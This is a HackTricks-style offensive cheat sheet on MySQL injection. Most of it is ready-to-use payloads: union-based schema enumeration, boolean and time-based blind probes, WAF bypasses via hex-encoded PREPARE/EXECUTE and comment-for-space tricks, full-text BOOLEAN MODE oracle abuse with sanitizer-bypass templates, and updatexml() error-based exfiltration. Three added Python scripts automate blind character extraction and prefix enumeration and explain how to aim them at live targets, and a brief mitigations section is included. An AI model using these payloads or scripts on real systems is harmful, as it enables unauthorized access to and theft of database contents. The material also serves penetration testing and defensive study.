MySQL injection
Tip
Learn & practice AWS Hacking: HackTricks Training AWS Red Team Expert (ARTE)
Learn & practice GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)
Learn & practice Azure Hacking: HackTricks Training Azure Red Team Expert (AzRTE)
Support HackTricks
- Check the subscription plans!
- Join the 💬 Discord group or the telegram group or follow us on Twitter 🐦 @hacktricks_live.
- Share hacking tricks by submitting PRs to the HackTricks and HackTricks Cloud github repos.
Comments
-- MYSQL Comment (the -- must be followed by a space or a control character, otherwise it is parsed as two minus signs)
# MYSQL Comment
/* MYSQL Comment */
/*! MYSQL Special SQL */ Executed by MySQL, treated as an ordinary comment by other DBMSs
/*!32302 10*/ Executed only when the MySQL version is 3.23.02 or newer
Interesting Functions
Confirm it is MySQL:
concat('a','b')
database()
version()
user()
system_user()
@@version
@@datadir
rand()
floor(2.9)
length(1)
count(1)
Useful functions
SELECT hex(database())
SELECT conv(hex(database()),16,10) # Hexadecimal -> Decimal
SELECT DECODE(ENCODE('cleartext', 'PWD'), 'PWD') # encode() returns a binary string; both functions were removed in MySQL 8.0
SELECT uncompress(compress(database())) # compress() returns a binary string, uncompress() restores the original
SELECT replace(database(),"r","R")
SELECT substr(database(),1,1)='r'
SELECT substring(database(),1,1)=0x72
SELECT ascii(substring(database(),1,1))=114
SELECT database()=char(114,101,120,116,101,115,116,101,114)
SELECT group_concat(<COLUMN>) FROM <TABLE> # output is truncated at group_concat_max_len (1024 bytes by default)
SELECT group_concat(if(strcmp(table_schema,database()),table_name,null))
SELECT group_concat(CASE(table_schema)When(database())Then(table_name)END)
strcmp(),mid(),lpad(),rpad(),left(),right(),instr(),sleep()
All-in-one injection payload
SELECT * FROM some_table WHERE double_quotes = "IF(SUBSTR(@@version,1,1)<5,BENCHMARK(2000000,SHA1(0xDE7EC71F1)),SLEEP(1))/*'XOR(IF(SUBSTR(@@version,1,1)<5,BENCHMARK(2000000,SHA1(0xDE7EC71F1)),SLEEP(1)))OR'|"XOR(IF(SUBSTR(@@version,1,1)<5,BENCHMARK(2000000,SHA1(0xDE7EC71F1)),SLEEP(1)))OR"*/"
from https://labs.detectify.com/2013/05/29/the-ultimate-sql-injection-payload/
Flow
Note that in "modern" versions of MySQL you can substitute information_schema.tables with mysql.innodb_table_stats (this can help to bypass WAFs, but reading the mysql schema requires privileges that a web application's database user often lacks).
SELECT table_name FROM information_schema.tables WHERE table_schema=database();#Get name of the tables
SELECT column_name FROM information_schema.columns WHERE table_name="<TABLE_NAME>"; #Get name of the columns of the table
SELECT <COLUMN1>,<COLUMN2> FROM <TABLE_NAME>; #Get values
SELECT user FROM mysql.user WHERE file_priv='Y'; #Users with file privileges
Only 1 value
group_concat()
Limit X,1
Blind one by one
substr(version(),X,1)='r'
substring(version(),X,1)=0x70
ascii(substr(version(),X,1))=112
mid(version(),X,1)='5'
Blind adding
LPAD(version(),1...length(version()),'1')='asd'...
RPAD(version(),1...length(version()),'1')='asd'...
SELECT RIGHT(version(),1...length(version()))='asd'...
SELECT LEFT(version(),1...length(version()))='asd'...
SELECT INSTR('foobarbar', 'fo...')=1
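The character-by-character probes in the "Blind one by one" and "Blind adding" sections only become practical when a script bisects on the ASCII value instead of guessing every character. The following is an added example, not code from the original HackTricks page: it builds the ascii(substr(...)) predicates, recovers version() with an 8-request bisection over 0..255 per position, and stops when ascii() returns 0 for a position past the end of the string. The target is simulated: SECRET and fake_oracle() are constructed stand-ins for the real response or timing oracle, and time_based() shows the SLEEP() wrapper you would send when the page shows no visible difference.

```python
import re

# Constructed secret standing in for version() on the target. On a real engagement
# fake_oracle() is replaced by a function that sends the predicate inside the
# injection point and reports whether the "true" response (or delay) was observed.
SECRET = "8.0.36-MySQL"


def predicate(expr, pos, value):
    """Boolean-blind predicate: is the byte at 1-based position `pos` of `expr` > value?
    MySQL returns '' for substr() past the end and ascii('') is 0, which marks the end."""
    return f"ascii(substr({expr},{pos},1))>{value}"


def time_based(pred, delay=2):
    """Wrap a predicate so the only observable is latency (true -> SLEEP(delay))."""
    return f"IF({pred},SLEEP({delay}),0)"


def fake_oracle(pred):
    """Stand-in for the HTTP request; it only understands predicates built by predicate()."""
    m = re.fullmatch(r"ascii\(substr\(version\(\),(\d+),1\)\)>(\d+)", pred)
    pos, value = int(m.group(1)), int(m.group(2))
    byte = ord(SECRET[pos - 1]) if pos <= len(SECRET) else 0
    return byte > value


def extract(oracle, expr="version()", max_len=64):
    """Recover `expr` one character at a time, bisecting the byte value 0..255
    (ascii() returns the leftmost byte, so non-ASCII data still fits). Returns the
    recovered string and the number of oracle queries spent."""
    out, requests = "", 0
    for pos in range(1, max_len + 1):
        lo, hi = 0, 255  # invariant: lo <= byte <= hi
        while lo < hi:
            mid = (lo + hi) // 2
            requests += 1
            if oracle(predicate(expr, pos, mid)):
                lo = mid + 1
            else:
                hi = mid
        if lo == 0:  # ascii('') == 0: we are past the end of the string
            break
        out += chr(lo)
    return out, requests


if __name__ == "__main__":
    value, n = extract(fake_oracle)
    print(f"version() = {value!r} recovered with {n} oracle queries")
    print("time-based form of one probe:", time_based(predicate("version()", 1, 64)))
```

Against a real target, replace fake_oracle with a function that injects the predicate (or its time_based() form) and returns True when the response matches the "true" case; length(version()) can be bisected the same way to bound the loop instead of relying on the ascii()==0 terminator.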
Detect the number of columns
Using a simple ORDER BY
order by 1
order by 2
order by 3
...
order by XXX
UniOn SeLect 1
UniOn SeLect 1,2
UniOn SeLect 1,2,3
...
MySQL Union Based
UniOn Select 1,2,3,4,...,gRoUp_cOncaT(0x7c,schema_name,0x7c)+fRoM+information_schema.schemata
UniOn Select 1,2,3,4,...,gRoUp_cOncaT(0x7c,table_name,0x7C)+fRoM+information_schema.tables+wHeRe+table_schema=...
UniOn Select 1,2,3,4,...,gRoUp_cOncaT(0x7c,column_name,0x7C)+fRoM+information_schema.columns+wHeRe+table_name=...
UniOn Select 1,2,3,4,...,gRoUp_cOncaT(0x7c,data,0x7C)+fRoM+...
SSRF
Learn here the different options to abuse a MySQL injection to obtain an SSRF.
WAF bypass techniques
Executing queries through Prepared Statements
If stacked queries are allowed (the client connector must have multi-statement support enabled, which most connectors disable by default), it may be possible to bypass WAFs by assigning the hex representation of the query you want to execute to a variable (using SET), and then using the MySQL PREPARE and EXECUTE statements to finally run the query. Something like this:
0); SET @query = 0x53454c45435420534c454550283129; PREPARE stmt FROM @query; EXECUTE stmt; #
(0x53454c45435420534c454550283129 is the hex encoding of SELECT SLEEP(1).) For more information please refer to this blog post.
Information_schema alternatives
Note that in "modern" versions of MySQL you can substitute information_schema.tables with mysql.innodb_table_stats or with sys.x$schema_flattened_keys or with sys.schema_table_statistics
MySQL injection without commas
Select 2 columns without using any comma (https://security.stackexchange.com/questions/118332/how-make-sql-select-query-without-comma):
-1' union select * from (select 1)UT1 JOIN (SELECT table_name FROM mysql.innodb_table_stats)UT2 on 1=1#
Getting values without the column names
If at some point you know the name of the table but you don't know the names of its columns, you can try to discover how many columns it has by executing something like:
# When the comparison runs without an "Operand should contain N column(s)" error, you have found the number of columns
select (select "", "") = (SELECT * from demo limit 1); # 2 columns
select (select "", "", "") < (SELECT * from demo limit 1); # 3 columns
If there are 2 columns (the first being an ID) and the other is a flag, you can try to bruteforce the contents of the flag character by character; the row is compared lexicographically, so < and > let you test a prefix instead of needing the whole value:
# = only returns True when the whole row matches; use < / > to test one character at a time
select (select 1, 'flag') = (SELECT * from demo limit 1);
More info in https://medium.com/@terjanq/blind-sql-injection-without-an-in-1e14ba1d4952
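The row-comparison trick above can be automated end to end. The following is an added example, not code from the page or from the linked write-up: it first finds the column count (the first row width that compares without an error) and then leaks the last column of the first row by bisecting, at each position, for the largest character c for which (known_columns..., prefix+c) <= (SELECT * FROM table LIMIT 1) still holds. The target is a constructed in-memory SQLite table named demo (SQLite supports the same row-value comparisons and raises on a width mismatch, as MySQL does with "Operand should contain N column(s)"); the oracle() function is the stand-in for the application's true/false/error response.

```python
import sqlite3
import string


def make_demo_db():
    """Constructed stand-in for the target: a table whose column names we pretend not to know."""
    con = sqlite3.connect(":memory:")
    con.execute("CREATE TABLE demo (id INTEGER, flag TEXT)")
    con.execute("INSERT INTO demo VALUES (1, 'flag{row_cmp}')")
    return con


def oracle(con, expr):
    """Boolean oracle: True/False for the predicate, None when the engine raises
    (MySQL: 'Operand should contain N column(s)' on a column-count mismatch)."""
    try:
        return bool(con.execute("SELECT " + expr).fetchone()[0])
    except sqlite3.Error:
        return None


def sql_str(s):
    """Quote a string literal, doubling embedded single quotes."""
    return "'" + s.replace("'", "''") + "'"


def find_column_count(con, table, max_cols=16):
    """The first row width that compares without an error is the column count."""
    for n in range(1, max_cols + 1):
        probe = "(SELECT " + ",".join(["''"] * n) + ")"
        if oracle(con, f"{probe} <= (SELECT * FROM {table} LIMIT 1)") is not None:
            return n
    return None


def leak_last_column(con, table, known_literals):
    """Recover the last column of the first row of `table`. Rows compare lexicographically,
    so (known..., prefix+c) <= row holds exactly when c <= the next character of the value;
    at each position we bisect for the largest c that still compares true."""
    # printable ASCII in code-point order (binary collation), which keeps the search monotone
    alphabet = sorted(set(string.printable) - set("\t\n\r\x0b\x0c"))
    found = ""
    while True:
        lo, hi, best = 0, len(alphabet) - 1, None
        while lo <= hi:
            mid = (lo + hi) // 2
            guess = sql_str(found + alphabet[mid])
            row = "(SELECT " + ",".join(known_literals + [guess]) + ")"
            if oracle(con, f"{row} <= (SELECT * FROM {table} LIMIT 1)"):
                best, lo = mid, mid + 1
            else:
                hi = mid - 1
        if best is None:  # no character extends the prefix: the value is fully recovered
            return found
        found += alphabet[best]


if __name__ == "__main__":
    con = make_demo_db()
    print("columns:", find_column_count(con, "demo"))
    print("leaked:", leak_last_column(con, "demo", ["1"]))
```

On MySQL the same predicates work against the real table, but the default collations are case-insensitive and ignore trailing spaces (PAD SPACE), so compare against BINARY <column> or CAST(... AS BINARY) on the right-hand side, or shrink the alphabet accordingly, otherwise the bisection can stop on the wrong character.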
Injection without SPACES (/**/ comment trick)
Some applications sanitize or parse user input with functions such as sscanf("%128s", buf), which stop at the first whitespace character.
Because MySQL treats the sequence /**/ as a comment that also separates tokens, it can be used to remove every normal space from the payload while keeping the query syntactically valid.
Example of a time-based blind injection that bypasses the space filter:
GET /api/fabric/device/status HTTP/1.1
Authorization: Bearer AAAAAA'/**/OR/**/SLEEP(5)--/**/-'
Which the database parses like:
' OR SLEEP(5)-- -'
Note that MySQL only treats -- as a comment when it is followed by whitespace, so --/**/ does not open one; the trailing -/**/-' still parses, as a chain of unary minuses applied to the application's own closing quote, so the SLEEP() is evaluated either way.
This is especially useful when:
- The controllable buffer has a size limit (e.g. %128s) and spaces would terminate the input early.
- Injecting through HTTP headers or other places where normal spaces are stripped or used as separators.
- Chained with INTO OUTFILE primitives to reach full pre-auth RCE (see the MySQL File RCE section).
MySQL history
You can see other statements executed inside MySQL by reading the view: sys.x$statement_analysis
Version alternatives
mysql> select @@innodb_version;
mysql> select @@version;
mysql> select version();
MySQL Full-Text Search (FTS) BOOLEAN MODE operator abuse (WOR)
This is not classic SQL injection. When developers embed user input inside MATCH(col) AGAINST('...' IN BOOLEAN MODE), MySQL evaluates a rich set of Boolean search operators inside the quoted string literal. Most WAF/SAST rules only look for quote breakouts and miss this feature.
Key points:
- Operators are evaluated inside the quotes: + (must include), - (must not include), * (trailing wildcard), "..." (exact phrase), () (grouping), < > ~ (weights). See the MySQL docs.
- This allows presence/absence tests and prefix tests without leaving the string literal, for example AGAINST('+admin*' IN BOOLEAN MODE) to check for any word starting with admin.
- It has been used to build oracles such as "does any row contain a term with prefix X?" and to enumerate hidden strings through prefix expansion.
SELECT tid, firstpost
FROM threads
WHERE MATCH(subject) AGAINST('+jack*' IN BOOLEAN MODE);
If the application returns different responses depending on whether the result set is empty (for example a redirect versus an error message), that behaviour becomes a Boolean oracle that can be used to enumerate private data such as hidden/deleted titles.
Sanitizer bypass patterns (generic):
- Boundary-trim preserving wildcard: if the backend trims the last 1–2 characters of every word with a regex like (\b.{1,2})(\s)|(\b.{1,2}$), send prefix*ZZ. The cleaner trims the ZZ but leaves the *, so prefix* survives.
- Early-break stripping: if the code strips operators from each word but stops processing once it meets any token whose length is >= the minimum length, send two tokens: first a junk token that satisfies the length threshold, then the token carrying the operator payload. For example: &&&&& +jack*ZZ → after cleaning: +&&&&& +jack*.
Payload template (URL-encoded):
keywords=%26%26%26%26%26+%2B{FUZZ}*xD
%26 is &, %2B is +. The trailing xD (or any two letters) is cut off by the cleaner, preserving {FUZZ}*.
- Treat a redirect as "match" and the error page as "no match". Do not follow redirects automatically, so the oracle stays observable.
Enumeration workflow:
- Start with {FUZZ} = a…z, 0…9 to find first-character matches via +a*, +b*, …
- For each positive prefix, branch: a* → aa* / ab* / …. Repeat until the whole string is recovered.
- Remember that words shorter than the minimum token size (ft_min_word_len for MyISAM, innodb_ft_min_token_size for InnoDB) and stopwords are not indexed, so an exact test such as +the can be negative even though the word is present.
- Spread the requests (proxies, multiple accounts) if the app enforces flood control.
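The enumeration workflow above is a depth-first walk over prefixes, with +prefix* asking "any token starting with prefix?" and +prefix (no wildcard) asking "is prefix itself a token?". The following is an added example, not code from the page or from the ReDisclosure write-up: enumerate_terms() performs that walk against any boolean oracle, build_keywords() produces the junk-token/suffix template from the page, and fake_boolean_match() is a constructed, simplified model of MATCH(subject) AGAINST(... IN BOOLEAN MODE) over a few hidden subjects (only the + and * operators are modelled; stopwords, minimum token size and the application's sanitizer are not).

```python
import re
import string
from urllib.parse import quote_plus

# Constructed hidden rows standing in for thread subjects that the app MATCH()es
# before its visibility check; the attacker never sees them directly.
HIDDEN_SUBJECTS = ["Jack the Ripper thread", "jackpot winners", "secret meeting notes"]


def _tokens(text):
    return set(re.findall(r"[a-z0-9]+", text.lower()))


def fake_boolean_match(against):
    """Simplified model of the app's 'any rows?' oracle on top of
    MATCH(subject) AGAINST(against IN BOOLEAN MODE): every +term must be present
    as a whole token, every +term* as a token prefix, in at least one row."""
    required = re.findall(r"\+([a-z0-9]+)(\*?)", against)
    for subject in HIDDEN_SUBJECTS:
        words = _tokens(subject)
        if all(any(w == term or (star and w.startswith(term)) for w in words)
               for term, star in required):
            return True
    return False


def build_keywords(fuzz, junk="&&&&&", suffix="xD"):
    """Page's template: junk token first so an early-break cleaner stops there, the real
    operator second, and a 2-char suffix that a boundary-trimming cleaner eats instead of '*'."""
    return f"{junk} +{fuzz}*{suffix}"


def encode_keywords(fuzz):
    """URL-encoded form of the template as it would travel in a form body."""
    return quote_plus(build_keywords(fuzz))


def enumerate_terms(oracle, alphabet=string.ascii_lowercase + string.digits, max_len=32):
    """Depth-first prefix expansion over `alphabet`. Returns the recovered tokens
    (in lexicographic order, since children are visited alphabetically) and the
    number of oracle requests spent."""
    found, requests = [], 0

    def ask(query):
        nonlocal requests
        requests += 1
        return oracle(query)

    def walk(prefix):
        if prefix and ask(f"+{prefix}"):   # exact-token test: '+jack' does not match 'jackpot'
            found.append(prefix)
        if len(prefix) >= max_len:
            return
        for c in alphabet:
            if ask(f"+{prefix}{c}*"):      # prefix test: branch only where something matches
                walk(prefix + c)

    walk("")
    return found, requests


if __name__ == "__main__":
    terms, n = enumerate_terms(fake_boolean_match)
    print(f"recovered {terms} with {n} requests")
    print("one probe as sent:", encode_keywords("jack"))
```

Against a live target the oracle is a function that submits encode_keywords(query) without following redirects and maps redirect to True and error page to False; the request count returned by enumerate_terms() is what you need to budget against flood control.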
Why titles often leak while contents don't:
- Some apps only perform the visibility check after a preliminary MATCH on titles/subjects. If the control flow branches on "any results?" before filtering, existence leaks.
Mitigations:
- If Boolean logic isn't needed, use IN NATURAL LANGUAGE MODE or treat user input as a literal (escaping/quoting does not remove the operator semantics of the other modes).
- If Boolean mode is required, strip or neutralize all Boolean operators (+ - * " ( ) < > ~) on every token (with no early break) after tokenization.
- Enforce visibility/authorization filters before MATCH, or make responses uniform (constant timing/status) whether the result set is empty or not.
- Check for similar features in other DBMSs: PostgreSQL to_tsquery/websearch_to_tsquery and SQL Server/Oracle/Db2 CONTAINS also parse operators inside quoted arguments.
Notes:
- Prepared statements do not protect against semantic abuse of REGEXP or search operators. Input such as .* remains a permissive regex even inside a quoted REGEXP '.*'. Use allow-lists or explicit guards.
Error-based exfiltration via updatexml()
When the application only returns SQL errors (not raw result sets), you can leak data through MySQL error strings:
# LookML dimension (Looker); the sql: field is concatenated into the generated query
dimension: id {
type: number
sql: updatexml(null, concat(0x7e, IFNULL((SELECT name FROM project_state LIMIT 1 OFFSET 0), 'NULL'), 0x7e, '///'), null) ;;
}
updatexml() raises an "XPATH syntax error" that includes the concatenated string, so the value from the inner SELECT shows up in the error response between the delimiters (0x7e = ~). Iterate LIMIT 1 OFFSET N to enumerate the rows. This works even when the UI only performs "boolean" checks, because the error message is still displayed. Note that the error message only carries the first 32 characters of the XPath expression, so leak longer values in chunks with substr().
Other MySQL injection guides
Marejeleo
- Pre-auth SQLi to RCE in Fortinet FortiWeb (watchTowr Labs)
- MySQL Full-Text Search – Boolean mode
- MySQL Full-Text Search – Overview
- MySQL REGEXP documentation
- ReDisclosure: New technique for exploiting Full-Text Search in MySQL (myBB case study)
- LookOut: RCE and internal access on Looker (Tenable)